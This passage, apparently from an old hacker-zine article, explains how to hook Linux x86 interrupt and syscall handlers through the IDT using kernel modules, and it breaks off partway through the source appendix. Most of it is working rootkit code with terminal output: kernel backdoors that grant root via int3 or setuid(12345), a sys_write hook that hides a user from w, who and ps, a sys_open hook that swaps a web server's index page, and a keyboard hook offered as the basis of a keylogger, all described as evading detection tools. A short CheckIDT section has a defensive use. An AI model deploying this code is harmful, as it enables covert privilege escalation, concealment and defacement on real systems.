+ptr_idt_table) [n];
+        return ((void *) ((idte->offset_high << 16 ) + idte->offset_low));
+
+n = the number of the interrupt to hook. idte will then contain the
+given interrupt descriptor.
+
+We send the handler's address back,for it we send a type
+(void*) (32 bits).
+
+offset_high and offset_low do both 16 bits, we slide the bit for offset 
+high to the left,and we add offset_low. The whole part give the handler's
+address. 
+
+4 : new_addr contain our handler's address,always  32 bits.
+We extract the 16 MSB and put them into offset_high and the  16
+LSB into  offset_low. 
+
+The fields offset_high and offset_low of the interrupt's descriptor to
+handle have been changed. 
+
+The whole code is available in annexe CODE 1
+
+Why is this technique not perfect?
+Its not that its bad, but it isn't appropriate for the others
+interrupt.Here we admit that all handler are like that :
+
+pushl $0 
+pushl $ SYMBOL_NAME(do_####name)
+jmp error_code
+
+
+    It's True.If you give a look in entry.S, they are almost all look like
+this. But not all. Imagine you wanna hook the syscall's handler, The
+device_not_aivable Handler (even if its not really interesting)or even the
+hardware interrupt....How Will we do it ?
+
+----[ 3.4 - Generic interrupt hooking
+
+We are going to use another technique to hook a handler. Remember, in the 
+handler written in C, we went back to the true C handler thanks to a 
+return. 
+
+Now, we are going to go back in the asm code.
+
+Simple example of handler :
+
+void stub_kad(void)
+        {
+__asm__ (
+        ".globl my_stub                 \n"
+        ".align 4,0x90                  \n"
+        "my_stub:                       \n"
+        "       call *%0                \n"
+        "       jmp  *%1                  \n"
+        ::"m"(hostile_code),"m"(old_stub)
+        );
+        }
+
+Here, we make a call to our fake C handler, the handler is executed and 
+goes back to the asm handler which jumps to the true asm handler !
+
+Our C handler :
+
+asmlinkage void my_function()
+        {
+        printk("<1>Interrupt %i hijack \n",interrupt);
+        }
+
+
+What happens ?
+
+We are going to change the address in the idt by the address of our asm 
+handler. This one will jump to our C handler and will go back to our asm 
+handler which, at the end, will jump to the true asm handler the address 
+of which we have saved.
+
+::"m"(hostile_code),"m"(old_stub)
+
+
+For those who had not felt up to read the doc on asm inline, here is the 
+syntax :
+
+asm (
+    assembler instruction
+    : output operands
+    : input operands
+    : list of modified registers
+);
+
+
+You can put asm or __asm__. __asm__ is used to avoid confusion with other 
+vars. You can also put asm volatile, in this case the asm code won't 
+be changed (optimized) during the compilation.
+
+"m"(hostile_code) and "m"(old_stub) are input operands. The first one is 
+equal to %0, the second one to %1, ... So call %0 is equal to call 
+hostile_code. "m" means memory address. hostile_code corresponds to the 
+address of our C handler and old_stub to the address of the handler that 
+was in the idt previously. If this seems impossible to understand, I advice
+you to read the doc on asm inline [1]. 
+
+The whole code is in annexe. All the next codes comes from this code. 
+In each new example, I will only show the asm handler et the C handler. 
+The rest will be the same. 
+
+
+First concrete example :
+
+bash-2.05# cat test.c
+#include <stdio.h>
+
+int main ()
+{
+  int a=8,b=0;
+  printf("A/B = %i\n",a/b);
+  return 0;
+}
+bash-2.05# gcc -I/usr/src/linux/include -O2 -c hookstub-V0.2.c
+bash-2.05# insmod hookstub-V0.2.o interrupt=0
+Inserting hook
+Hooking finish
+bash-2.05# ./test
+Floating point exception
+Interrupt 0 hijack
+bash-2.05# rmmod hookstub-V0.2
+Removing hook
+bash-2.05#
+
+Good ! We see the "Interrupt hijack".
+
+In this code, we use MODULE_PARM which will allow to give parameters during
+the module insertion. For further information about this syntax, read 
+"linux device drivers" from o'reilly [2] (chapter 2). This will allow us 
+to hook a chosen interrupt with the same module.
+
+
+----[ 3.5 - Hooking for profit : our first backdoor
+
+This first very simple backdoor will allow us to obtain a root shell. 
+The C handler is going to give the root rights to the process that has 
+generated the interrupt.
+
+Asm handler
+------------
+
+void stub_kad(void)
+        {
+__asm__ (
+        ".globl my_stub                 \n"
+        ".align 4,0x90                  \n"
+        "my_stub:                       \n"
+        "       pushl %%ebx             \n"
+        "       movl %%esp,%%ebx        \n"
+        "       andl $-8192,%%ebx       \n"
+        "       pushl %%ebx             \n"
+        "       call *%0                \n"
+        "       addl $4,%%esp           \n"
+        "       popl %%ebx              \n"
+        "       jmp  *%1                \n"
+        ::"m"(hostile_code),"m"(old_stub)
+        );
+        }
+
+We give to the C handler the address of the current process descriptor. 
+We get it back like in error_code, thanks to the macro GET_CURRENT : 
+
+#define GET_CURRENT(reg) \
+    movl %esp, reg; \
+    andl $-8192, reg;
+
+defined in entry.S.
+
+rem : We can also use current instead.
+
+We put the result on the stack and we call our function. The rest of the 
+asm code puts the stack back in its previous state and jumps to the
+true handler.
+
+
+C handler :
+-------------
+...
+unsigned long hostile_code=(unsigned long)&my_function;
+...
+
+asmlinkage void my_function(unsigned long addr_task)
+        {
+        struct task_struct *p = &((struct task_struct *) addr_task)[0];
+    	if(strcmp(p->comm,"give_me_root")==0 )
+                {
+                p->uid=0;
+                p->gid=0;
+                }
+        }
+
+We declare a pointer on the current process descriptor. We compare the name
+of the process with a name we have chosen. We must not attribute the root 
+rights to all the process which would generate this interrupt. If it is 
+the good process, then we can give it new rights.
+
+"give_me_root" is a little program which launch a shell 
+(system("/bin/sh")). We will only have to put a breakpoint before system
+ to launch a shell with the root rights. 
+
+In practice :
+--------------
+
+bash-2.05# gcc -I/usr/src/linux/include -O2 -c hookstub-V0.3.2.c
+bash-2.05# insmod hookstub-V0.3.2.o interrupt=3
+Inserting hook
+Hooking finish
+bash-2.05#
+
+///// in another shell //////
+
+sh-2.05$ cat give_me_root.c
+#include <stdio.h>
+
+int main (int argc, char ** argv)
+    {
+    system("/bin/sh");
+    return 0;
+    }
+
+sh-2.05$ gcc -o give_me_root give_me_root.c
+sh-2.05$ id
+uid=1000(kad) gid=100(users) groups=100(users)
+sh-2.05$ gdb give_me_root -q
+(gdb) b main
+Breakpoint 1 at 0x80483f6
+(gdb) r
+Starting program: /tmp/give_me_root
+
+Breakpoint 1, 0x080483f6 in main ()
+(gdb) c
+Continuing.
+sh-2.05# id
+uid=0(root) gid=0(root) groups=100(users)
+sh-2.05#
+
+We are root. The code is in annexe, CODE 2.
+
+
+----[ 3.6 - Hooking for fun
+
+A program that could be interesting is an exception tracer. We could for 
+example hook all the exceptions to print the name of the process that has 
+provoked the exception. We could know all the time who launch what. 
+We could also print the values of the registers. 
+There is a function show_regs that is in  arch/i386/kernel/process.c :
+
+void show_regs(struct pt_regs * regs)
+{
+    long cr0 = 0L, cr2 = 0L, cr3 = 0L;
+
+    printk("\n");
+    printk("EIP: %04x:[<%08lx>]",0xffff & regs->xcs,regs->eip);
+    if (regs->xcs & 3)
+        printk(" ESP: %04x:%08lx",0xffff & regs->xss,regs->esp);
+    printk(" EFLAGS: %08lx\n",regs->eflags);
+    printk("EAX: %08lx EBX: %08lx ECX: %08lx EDX: %08lx\n",
+        regs->eax,regs->ebx,regs->ecx,regs->edx);
+    printk("ESI: %08lx EDI: %08lx EBP: %08lx",
+        regs->esi, regs->edi, regs->ebp);
+    printk(" DS: %04x ES: %04x\n",
+        0xffff & regs->xds,0xffff & regs->xes);
+    __asm__("movl %%cr0, %0": "=r" (cr0));
+    __asm__("movl %%cr2, %0": "=r" (cr2));
+    __asm__("movl %%cr3, %0": "=r" (cr3));
+    printk("CR0: %08lx CR2: %08lx CR3: %08lx\n", cr0, cr2, cr3);
+}
+
+You can use this code to print the state of the registers at every 
+exception.
+
+    Something more dangerous would be to change the asm handler so that it
+would not execute the true C handler. The process that has generated the
+exception would not receive such signals as SIGSTOP or SIGSEGV. This would
+be very useful in some situations.
+
+
+--[ 4 - THE HARDWARE INTERRUPTS
+
+----[ 4.1 - How does it works ?
+
+    We can also hook interrupts generated by IRQs with the same method but 
+they are less interesting to hook (unless you have a great idea ;). We are 
+going to hook interrupt 33 which is keyboard's. The problem is that this 
+interrupt happens a lot more. The handler will be executed a large number 
+of times and will have to go very fast to not block the system. To avoid 
+this, we are going to use bottom half. There are functions of low priority
+which are used for interrupt handling in most cases . The kernel is waiting
+for the adequate time to launch it, and other interruptions are not masked 
+during its execution
+ 
+The waiting bottom half will be executed only at the following:
+
+- the kernel finishes to handle a syscall
+- the kernel finishes to handle a exception 
+- the kernel finishes to handle a interrupt
+- the kernel uses the schedule() function in order to select a new
+process 
+
+But they will be executed before the processor goes back in user mode. 
+
+So the bottom half are useful to ensure the quick handle of an
+interruption.
+
+Here are some examples of linux used bottom halves
+
+----------------+-------------------------------+
+Bottom half     |       Peripheral equipment    |
+----------------+-------------------------------+
+CONSOLE_BH      |       Virtual console         |
+IMMEDIATE_BH    |       Immediate tasks file    |
+KEYBOARD_BH     |       Keyboard                |
+NET_BH          |       Network interface       |
+SCSI_BH         |       SCSI interface          |
+TIMER_BH        |       Clock                   |
+TQUEUE_BH       |       Periodic tasks queue    |
+...             |                               |
+----------------+-------------------------------+
+
+
+    My goal writing this paper is not to study the bottom halves, as it's a
+too wide topic. Anyway, for more informations about that topic, you can
+have a look at
+
+http://users.win.be/W0005997/UNIX/LINUX/IL/kernelmechanismseng.html [8]
+
+IRQ list
+--------
+
+BEWARE ! : the number of the interrupts are not always the same for the 
+IRQs!
+
+----+---------------+----------------------------------------
+IRQ | Interrupt     | Peripheral equipment
+----+---------------+----------------------------------------
+0   | 32            | Timer
+1   | 33            | Keyboard
+2   | 34            | PIC cascade
+3   | 35            | Second serial port
+4   | 36            | First serial port
+6   | 37            | Floppy drive
+8   | 40            | System clock
+11  | 43            | Network interface
+12  | 44            | PS/2 mouse
+13  | 45            | Mathematic coprocessor
+14  | 46            | First EIDE disk controller
+15  | 47            | Second EIDE disk controller
+----+---------------+----------------------------------------
+
+
+----[ 4.2 - Initialization and activation of a bottom half
+
+    The low parts must be initialized with the function init_bh(n,routine)
+that insert the address routine in the n-th entry of bh_base (bh_base is an
+array where low parts are kept). When it is initialized, it can be
+activated and executed. The function mark_bh(n) is used by the interrupt
+handler to activate the n-th low part.
+
+The tasklets are the functions themselves. There are put together in list 
+of elements of type tq_struct :
+
+struct tq_struct {
+    struct tq_struct *next;     /* linked list of active bh's */
+    unsigned long sync;     /* must be initialized to zero */
+    void (*routine)(void *);    /* function to call */
+    void *data;         /* argument to function */
+};
+
+    The macro DELACRE_TASK_QUEUE(name,fonction,data) allow to declare a
+tasklet that will then be inserted in the task queue thanks to the function
+queue_task. There is several task queues, the most interesting here is
+tq_immediate that is executed by the bottom half IMMEDIATE_BH (immediate
+task queue).
+
+(include/linux/tqueue.h)
+
+
+----[ 4.3 - Hooking of the keyboard interrupt
+
+    When we hit a key, the interrupt happens twice. Once when we push the
+key and once when we release the key. The code below will display a message
+every 10 interrupts. If we hit 5 keys, the message appears.
+
+I don't show the asm handler which is the same as in 3.4
+
+Code
+----
+...
+struct Variable
+    {
+    int entier;
+    char chaine[10];
+    };
+...
+static void evil_fonction(void * status)
+        {
+    struct Variable *var = (struct Variable * )status;
+    nb++;
+        if((nb%10)==0)printk("Bottom Half %i integer : %i string : %s\n",
+	nb,var->entier,var->chaine);
+        }
+...
+asmlinkage void my_function()
+        {
+        static struct Variable variable;
+        static struct tq_struct my_task = {NULL,0,evil_fonction,&variable};
+	variable.entier=3;
+    	strcpy(variable.chaine,"haha hijacked key :) ");
+        queue_task(&my_task,&tq_immediate);
+        mark_bh(IMMEDIATE_BH);
+        }
+
+
+    We declare a tasklet my_task. We initialize it with our function and
+the argument. As the tasklet allow us to take only one argument, we give
+the address of a structure. This will allow to use several arguments. We
+add the tasklet to the list tq_immediate thanks to queue_task. Finally, we 
+activate the low part IMMEDIATE_BH thanks to mark_bh:
+
+mark_bh(IMMEDIATE_BH) 
+
+    We have to activate IMMEDIATE_BH, which handles the tasks queue
+'tq_immediate' (the one where we added our own tasklet) evil_function is to
+be executed just after one of the requested event (listed in part 4.1)
+
+    evil_function is just going to display a message each time that the 
+interrupt happened 10 times. We effectively hooked the keyboard interrupt.
+We could use this method to code a keylogger. This one would be the most
+quiet because it would act at interrupts level. The issue, that I didn't
+solve, is to know which key has been hit. To do this, we can use the
+function inb() that can read on a I/O port. There are 65536 I/O ports 
+(8 bits ports). 2 8 bits ports make a 16 bits ports and 2 16 bits ports 
+make a 32 bits ports. The functions that allow us to access ports are: 
+
+inb,inw,inl    : allow to read 1, 2 or 4 consecutive bytes from a I/O port.
+outb,outw,outl : allow to write 1, 2 or 4 consecutive bytes to a I/O port.
+
+
+    So we can read the scancode of the keyboard thanks to the function inb,
+and its status (pushed, released). Unfortunately, I'm not sure of the port
+to read. The port for the scancode is 0x60 and the port for the status is
+0x64.
+
+scancode=inb(0x60);
+status=inb(0x64);
+
+
+    scancode is going to be equal to a value that will have to be
+transformed to know which key has been hit. This is realized with an array
+of value. It may exist a function that give directly the conversion, but
+I'm not sure. If anyone has information about it or wish to develop the
+topic, he can contact me.
+
+
+--[ 5 - THE EXCEPTION PROGRAMMED FOR THE SYSTEM CALL
+
+----[ 5.1 - List of the syscalls
+
+You can find a list of all the syscalls at the url : 
+http://www.lxhp.in-berlin.de/lhpsysc0.html [3]. 
+All syscalls are listed and the value to put in the registers are given.
+
+Rem : be ware, the numbers of the syscalls are not the same in 2.2.* 
+and 2.4.* kernels.
+
+
+----[ 5.2 - How does a syscall work ?
+
+    Thanks to the technique that we have just used here, we can also hook
+the syscalls. When a syscall is called, all the parameters of the syscall 
+are in the registers.
+
+eax : number of the called syscall
+ebx : first param
+ecx : second param
+edx : third param
+esi : fourth param
+edi : fifth param
+
+    The maximum number of arguments can't exceed 5. However, some syscalls
+need more than 5 arguments. It is the case for the syscall mmap (6 params). 
+In such a case, a single register is used to point to a memory area to the 
+addressing space of the process in user mode that contains the values of 
+the parameters.
+
+    We can get these values thanks to the structure pt_regs that we've seen
+before. We are going to hook syscalls at the IDT level and not in the
+syscall_table. kstat and all currently available LKM detection tools will
+fail in detecting our voodoo. I won't show you all what can be done by
+hooking the syscalls, the technique used by pragmatic or so in their LKMs
+are applicable here. I will show you how to hook some syscalls, you will
+be able to hook those you want using the same technique.
+
+
+----[ 5.3 - Hooking for profit
+
+------[ 5.3.1 - Hooking of sys_setuid
+
+SYS_SETUID:
+-----------
+
+EAX: 213
+EBX: uid
+
+We are going to begin with a simple case, a backdoor that change the rights
+of a process into root. The same backdoor as in 3.5 but we are going to 
+hook the syscall setuid.
+
+asm handler :
+--------------
+...
+#define sys_number 213
+...
+void stub_kad(void)
+        {
+__asm__ (
+        ".globl my_stub                 \n"
+        ".align 4,0x90                  \n"
+        "my_stub:                       \n"
+                //save the register value
+                "       pushl %%ds                      \n"
+                "       pushl %%eax                     \n"
+                "       pushl %%ebp                     \n"
+                "       pushl %%edi                     \n"
+                "       pushl %%esi                     \n"
+                "       pushl %%edx                     \n"
+                "       pushl %%ecx                     \n"
+                "       pushl %%ebx                     \n"
+                //compare if it's the good syscall
+                "       xor %%ebx,%%ebx                 \n"
+                "       movl %2,%%ebx                   \n"
+                "       cmpl %%eax,%%ebx                \n"
+                "       jne finis                       \n"
+                //if it's the good syscall, 
+		//put top stack address on stack :)
+                "       mov %%esp,%%edx                 \n"
+                "       mov %%esp,%%eax                 \n"
+                "       andl $-8192,%%eax               \n"
+                "       pushl %%eax                     \n"
+                "       push %%edx                      \n"
+                "       call *%0                        \n"
+                "       addl $8,%%esp                   \n"
+                "finis:                                 \n"
+                //restore register
+                "       popl %%ebx                      \n"
+                "       popl %%ecx                      \n"
+                "       popl %%edx                      \n"
+                "       popl %%esi                      \n"
+                "       popl %%edi                      \n"
+                "       popl %%ebp                      \n"
+                "       popl %%eax                      \n"
+                "       popl %%ds                       \n"
+                "       jmp  *%1                        \n"
+        ::"m"(hostile_code),"m"(old_stub),"i"(sys_number)
+        );
+        }
+
+
+- we save the values of all the registers on the stack
+- we compare eax that contains the number of the syscall with the value 
+  of sys_number that we have defined above.
+- if it is the good syscall, we put on the stack the value of esp from 
+  which have saved all the registers (that will be used for pt_regs) and 
+  the current process descriptor.
+- we call our C handler, then at the return, we pop 8 bytes (eax + edx).
+- finis : we put back the value of our registers and we call the true 
+  handler.
+
+By changing the value of sys_number, we can hook any syscall with this asm 
+handler.
+
+
+C handler
+----------
+
+asmlinkage void my_function(struct pt_regs * regs,unsigned long fd_task)
+        {
+        struct task_struct *my_task = &((struct task_struct *) fd_task)[0];
+        if (regs->ebx == 12345 )
+                {
+                my_task->uid=0;
+                my_task->gid=0;
+                my_task->suid=1000;
+                }
+        }
+
+We get the value of the registers in a pt_regs structure and the address 
+of the current fd. We compare the value of ebx with 12345, if it is equal 
+then we set the uid and the gid of the current process to 0.
+
+
+In practice :
+--------------
+
+bash-2.05$ cat setuid.c
+#include <stdio.h>
+int main (int argc,char ** argv)
+    {
+    setuid(12345);
+    system("/bin/sh");
+    return 0;
+    }
+bash-2.05$ gcc -o setuid setuid.c
+bash-2.05$ ./setuid
+sh-2.05# id
+uid=0(root) gid=0(root) groups=100(users)
+sh-2.05#
+
+
+We are root. This technique can be used with many syscalls.
+
+
+------[ 5.3.2 - Hooking of sys_write
+
+SYS_WRITE:
+----------
+
+EAX: 4
+EBX: file descriptor
+ECX: ptr to output buffer
+EDX: count of bytes to send
+
+We are going to hook sys_write so that it will replace a string in a 
+defined program. Then, we will hook sys_write so that it will replace 
+in the whole system. 
+
+The asm handler in the same as in 5.3.1
+
+
+C handler
+----------
+
+asmlinkage char * my_function(struct pt_regs * regs,unsigned long fd_task)
+        {
+        struct task_struct *my_task= &((struct task_struct *) fd_task) [0];
+        char *ptr=(char *) regs->ecx;
+        char * buffer,*ptr3;
+
+        if(strcmp(my_task->comm,"w")==0 || strcmp(my_task->comm,"who")==0||
+	    strcmp(my_task->comm,"lastlog")==0 || 
+	    ((progy != 0)?(strcmp(my_task->comm,progy)==0):0) )
+               {
+                buffer=(char * ) kmalloc(regs->edx,GFP_KERNEL);
+                copy_from_user(buffer,ptr,regs->edx);
+                if(hide_string)
+                        {
+                         ptr3=strstr(buffer,hide_string);
+                        }
+                else
+                        {
+                         ptr3=strstr(buffer,HIDE_STRING);
+                        }
+                if(ptr3 != NULL )
+                        {
+                        if (false_string)
+                        {
+                           strncpy(ptr3,false_string,strlen(false_string));
+                             }
+                        else
+                        {
+                           strncpy(ptr3,FALSE_STRING,strlen(FALSE_STRING));
+                                }
+                        copy_to_user(ptr,buffer,regs->edx);
+                        }
+                kfree(buffer);
+                }
+        }
+
+- We compare the name of the process with a defined program name and with 
+  the name that we will specify in param when we insert our module 
+  (progy param).
+- We allocate some space for the buffer that will receive the string that 
+  is in regs->ecx
+- We copy the string that sys_write is going to write from the userland to 
+  the kernelland (copy_from_user)
+- We search for the string we want to hide in the string that sys_write is 
+  going to write.
+- If found,we change the string to be hidden with the one wanted in 
+  our buffer.
+- we copy the false string in the userland (copy_to_user)
+
+
+In practice :
+--------------
+
+%gcc -I/usr/src/linux/include -O2 -c hookstub-V0.5.2.c
+%w
+ 12:07am  up 38 min,  2 users,  load average: 0.60, 0.60, 0.48
+USER     TTY      FROM              LOGIN@   IDLE   JCPU   PCPU  WHAT
+kad      tty1     -                11:32pm 35:15  14:57   0.03s  sh /usr/X11/bin/startx
+kad      pts/1    :0.0             11:58pm  8:51   0.08s  0.03s  man setuid
+%modinfo hookstub-V0.5.2.o
+filename:    hookstub-V0.5.2.o
+description: "Hooking of sys_write"
+author:      "kad"
+parm:        interrupt int, description "Interrupt number"
+parm:        hide_string string, description "String to hide"
+parm:        false_string string, description "The fake string"
+parm:        progy string, description "You can add another program to fake"
+%insmod hookstub-V0.5.2.o interrupt=128 hide_string=kad false_string=marcel 
+progy=ps
+Inserting hook
+Hooking finish
+
+%w
+ 12:07am  up 38 min,  2 users,  load average: 0.63, 0.61, 0.48
+USER     TTY      FROM              LOGIN@   IDLE   JCPU   PCPU  WHAT
+marcel   tty1     -                11:32pm 35:21  15:01   0.03s  sh /usr
+marcel   pts/1    :0.0             11:58pm  8:57   0.08s  0.03s  man setuid
+
+%ps -au
+USER       PID %CPU %MEM   VSZ  RSS TTY      STAT START   TIME COMMAND
+marcel     133  0.0  1.4  2044 1256 pts/0    S    May12   0:00 -bash
+root       146  0.0  1.4  2032 1260 pts/0    S    May12   0:00 -su
+root       243  0.0  1.6  2612 1444 pts/0    S    00:05   0:00 -sh
+root       259  0.0  0.9  2564  836 pts/0    R    00:07   0:00 ps -au
+%
+
+    The string "kad" is hidden. The whole source code is in annexe CODE 3. 
+This example is quite simple but could be more interesting. Instead of 
+changing "kad" with "marcel", we could change our IP address with
+another. And, instead of hooking the output of w, who or lastlog, we could
+use klogd...
+
+
+Complete hooking of sys_write
+------------------------------
+
+The complete hooking of sys_write can be useful in some case, like for example 
+changing an IP with another. But if you change a string completely, 
+you won't be hidden long. If you change a string with another, it's the whole 
+system that will be changed. Even a simple cat will be influenced :
+
+%insmod hookstub-V0.5.3.o interrupt=128 hide_string="hello!" false_string="bye!  "
+Inserting hook
+Hooking finish
+%echo hello!
+bye!
+%
+
+
+The C handler for this example is the same as the previous one without the 
+if condition. Beware, this could slow down your system a lot.
+
+
+----[ 5.4 - Hooking for fun
+
+This example is only "for fun" :), don't misuse it. You could turn an admin 
+mad... Thanks to Spacewalker for the idea (Hi Space ! :). The idea is to hook 
+the syscall sys_open so that it opens another file instead of a defined file, 
+but only if it is a defined "entity" that opens the file. This entity will be 
+httpd here...
+
+SYS_OPEN:
+---------
+
+EAX : 5
+EBX : ptr to pathname
+ECX : file access
+EDX : file permissions
+
+The asm handler is always the same as the previous ones.
+
+C handler :
+------------
+
+asmlinkage void my_function(struct pt_regs * regs,unsigned long fd_task)
+        {
+        struct task_struct *my_task = &((struct task_struct * ) fd_task) [0];
+    if(strcmp(my_task->comm,"httpd") == 0)
+        {
+        if(strcmp((char *)regs->ebx,"/var/www/htdocs/index.html.fr")==0)
+            {
+            copy_to_user((char *)regs->ebx,"/tmp/hacked",
+	    strlen((char *) regs->ebx));
+            }
+        }
+        }
+
+    We hook sys_open, if httpd call sys_open and tries to open index.html,
+then we change index.html with another page we've chosen. We can also use
+MODULE_PARM to more easily change the page. If someone opens the file with
+a classic editor, he will see the true index.html!
+
+    Hooking a syscall is very easy with this technique. Moreover, few
+modifications are to be done for hooking this or that syscall. The only
+thing to change is the C handler. We could however play with the asm
+handler, for example to invert 2 syscalls. We would only have to compare
+the value of eax and to change it with the number of a defined syscall. 
+For an admin, we could hook the "hot" syscalls and warn with a message as
+soon as the syscall is called. We would be warned of the modifications on
+the syscall_table.
+
+
+--[ 6 - CHECKIDT
+
+    CheckIDT is a little program that I have written that allow to "play"
+with the IDT from the userland. i.e. without using a lkm, thanks to the
+technique of sd and devik in Phrack 58 on /dev/kmem. All along my tests, 
+I had to face many kernel crashes and it was not dead but I couldn't 
+remove the lkm. I had to reboot to change the value of the IDT. CheckIDT
+allow to change the value of the IDT without the use of a lkm. CheckIDT is
+here to help you coding your lkms and prevent you from rebooting all the
+time. On the other hand, this software can warn you of modifications of the
+IDT and so be useful for admins. It can restore the IDT state in tripwire
+style. It saves each descriptor of the IDT in a file, then it compares the
+descriptors with the saved values and put the IDT back if there were
+modifications.
+
+
+Some examples of use :
+-----------------------
+
+%./checkidt
+CheckIDT V 1.1 by kad
+---------------------
+Option :
+       -a nb    show all info about one interrupt
+       -A       show all info about all interrupt
+       -I       show IDT address
+       -c       create file archive
+       -r       read file archive
+       -o file  output filename (for creating file archive)
+       -C       compare save idt & new idt
+       -R       restore IDT
+       -i file  input filename to compare or read
+       -s       resolve symbol thanks to /boot/System.map
+       -S file  specify a map file
+
+
+%./checkidt -a 3 -s
+
+Int *** Stub Address *** Segment *** DPL *** Type             Handler Name
+--------------------------------------------------------------------------
+3       0xc0109370       KERNEL_CS   3       System gate      int3
+
+
+Thanks for choose kad's products :-)
+%
+
+We can obtain information on an interrupt descriptor.
+"-A" allow to obtain information on all interrupts.
+
+
+%./checkidt -c
+
+Creating file archive idt done
+
+Thanks for choosing kad's products :-)
+%insmod hookstub-V0.3.2.o interrupt=3
+Inserting hook
+Hooking finished
+%./checkidt -C
+
+Hey stub address of interrupt 3 has changed!!!
+Old Value : 0xc0109370
+New Value : 0xc583e064
+
+Thanks for choosing kad's products :-)
+%./checkidt -R
+
+Restore old stub address of interrupt 3
+
+Thanks for choosing kad's products :-)
+%./checkidt -C
+
+All values are same
+
+Thanks for choosing kad's products :-)
+%lsmod
+Module                  Size  Used by
+hookstub-V0.3.2          928   0  (unused)
+...
+%
+
+So CheckIDT has restored the values of the IDT as they were before 
+inserting the module. However, the module is still here but has no effect. 
+As in tripwire, I advice you to put the IDT save file in a read only area, 
+otherwise someone could be compromised.
+
+rem : if the module is well hidden, you will also be warned of the modifications 
+of IDT.
+
+The whole source code is in annexe CODE 4.
+
+
+--[ 7 - REFERENCES
+
+[1] http://www.linuxassembly.org/resources.html#tutorials
+    Many docs on asm inline
+
+[2] http://www.xml.com/ldd/chapter/book/
+    linux device drivers
+
+[3] http://www.lxhp.in-berlin.de/lhpsysc0.html
+    detailed syscalls list
+
+[4] http://eccentrica.org/Mammon/
+    Mammon site, thanks mammon ;)
+
+[5] http://www.oreilly.com/catalog/linuxkernel/
+    o'reilly book , great book :)
+
+[6] http://www.tldp.org/LDP/lki/index.html
+    Linux Kernel 2.4 Internals
+
+[7] Sources of 2.2.19 and 2.4.17 kernel
+
+[8] http://users.win.be/W0005997/UNIX/LINUX/IL/kernelmechanismseng.html
+    good info about how bottom half work
+
+[9] http://www.s0ftpj.org/en/tools.html
+    kstat
+
+GREETZ
+
+- Special greetz to freya, django and neuro for helping me to translate
+  this text in English. Greetz again to skyper for his advice, thks a lot
+  man! :)
+- Thanks to Wax for his invaluable advise on asm (don't smoke to much dude !)
+- Big greetz to mayhem, insulted, ptah and sauron for testing the codes 
+  and verifying the text.
+- Greetz to #frogs people, #thebhz people, #gandalf people, #fr people, all 
+  those who were at the RtC.Party, nywass, the polos :) and all those I
+  forget.
+
+
+--[ 8 - Appendix
+
+
+CODE 1: 
+-------
+
+/*****************************************/
+/* hooking interrupt 3 . Idea by mammon  */
+/* with kad modification        	 */
+/*****************************************/
+
+#define MODULE
+#define __KERNEL__
+
+#include <linux/module.h>
+#include <linux/tty.h>
+#include <linux/sched.h>
+#include <linux/init.h>
+#include <linux/malloc.h>
+
+#define error_code 0xc01092d0 //error code in my system.map
+#define do_int3    0xc010977c //do_int3 in my system.map
+
+asmlinkage void my_handler(struct pt_regs * regs,long err_code);
+
+/*------------------------------------------*/
+unsigned long ptr_idt_table;
+unsigned long ptr_gdt_table;
+unsigned long old_stub;
+unsigned long old_handler=do_int3;
+extern asmlinkage void my_stub();
+unsigned long ptr_error_code=error_code;
+unsigned long ptr_handler=(unsigned long)&my_handler;
+/*------------------------------------------*/
+
+struct descriptor_idt
+        {
+        unsigned short offset_low,seg_selector;
+        unsigned char reserved,flag;
+        unsigned short offset_high;
+        };
+
+void stub_kad(void)
+        {
+__asm__ (
+        ".globl my_stub                 \n"
+        ".align 4,0x90                  \n"
+        "my_stub:                       \n"
+        "pushl $0                       \n"
+        "pushl ptr_handler(,1)          \n"
+        "jmp *ptr_error_code             "
+        ::
+        );
+        }
+
+asmlinkage void my_handler(struct pt_regs * regs,long err_code)
+        {
+        void (*old_int_handler)(struct pt_regs *,long) = (void *) old_handler;
+        printk("<1>Wowowo hijacking de l'int 3 \n");
+        (*old_int_handler)(regs,err_code);
+        return;
+        }
+
+unsigned long get_addr_idt (void)
+        {
+         unsigned char idtr[6];
+         unsigned long idt;
+        __asm__ volatile ("sidt %0": "=m" (idtr));
+        idt = *((unsigned long *) &idtr[2]);
+        return(idt);
+        }
+
+void * get_stub_from_idt (int n)
+        {
+        struct descriptor_idt *idte = &((struct descriptor_idt *) ptr_idt_table) [n];
+        return ((void *) ((idte->offset_high << 16 ) + idte->offset_low));
+        }
+
+void hook_stub(int n,void *new_stub,unsigned long *old_stub)
+        {
+         unsigned long new_addr=(unsigned long)new_stub;
+         struct descriptor_idt *idt=(struct descriptor_idt *)ptr_idt_table;
+         //save old stub
+         if(old_stub)
+                *old_stub=(unsigned long)get_stub_from_idt(3);
+         //assign new stub
+         idt[n].offset_high = (unsigned short) (new_addr >> 16);
+         idt[n].offset_low  = (unsigned short) (new_addr & 0x0000FFFF);
+         return;
+        }
+
+int init_module(void)
+        {
+        ptr_idt_table=get_addr_idt();
+        hook_stub(3,&my_stub,&old_stub);
+        return 0;
+        }
+
+void cleanup_module()
+        {
+         hook_stub(3,(char *)old_stub,NULL);
+        }
+
+******************************************************************************
+
+CODE 2:
+-------
+
+/****************************************************/
+/* IDT int3 backdoor. Give root right to the process
+/* Coded by kad
+/****************************************************/
+
+#define MODULE
+#define __KERNEL__
+#include <linux/module.h>
+#include <linux/tty.h>
+#include <linux/sched.h>
+#include <linux/init.h>
+#ifndef KERNEL2
+#include <linux/slab.h>
+#else
+#include <linux/malloc.h>
+#endif
+
+/*------------------------------------------*/
+asmlinkage void my_function(unsigned long);
+/*------------------------------------------*/
+MODULE_AUTHOR("Kad");
+MODULE_DESCRIPTION("Hooking of int3 , give root right to process");
+MODULE_PARM(interrupt,"i");
+MODULE_PARM_DESC(interrupt,"Interrupt number");
+/*------------------------------------------*/
+unsigned long ptr_idt_table;
+unsigned long old_stub;
+extern asmlinkage void my_stub();
+unsigned long hostile_code=(unsigned long)&my_function;
+int interrupt;
+/*------------------------------------------*/
+
+struct descriptor_idt
+        {
+        unsigned short offset_low,seg_selector;
+        unsigned char reserved,flag;
+        unsigned short offset_high;
+        };
+
+void stub_kad(void)
+        {
+__asm__ (
+        ".globl my_stub                 \n"
+        ".align 4,0x90                  \n"
+        "my_stub:                       \n"
+        "       pushl %%ebx             \n"
+        "       movl %%esp,%%ebx        \n"
+        "       andl $-8192,%%ebx       \n"
+        "       pushl %%ebx             \n"
+        "       call *%0                \n"
+        "       addl $4,%%esp           \n"
+        "       popl %%ebx              \n"
+        "       jmp  *%1                \n"
+        ::"m"(hostile_code),"m"(old_stub)
+        );
+        }
+
+
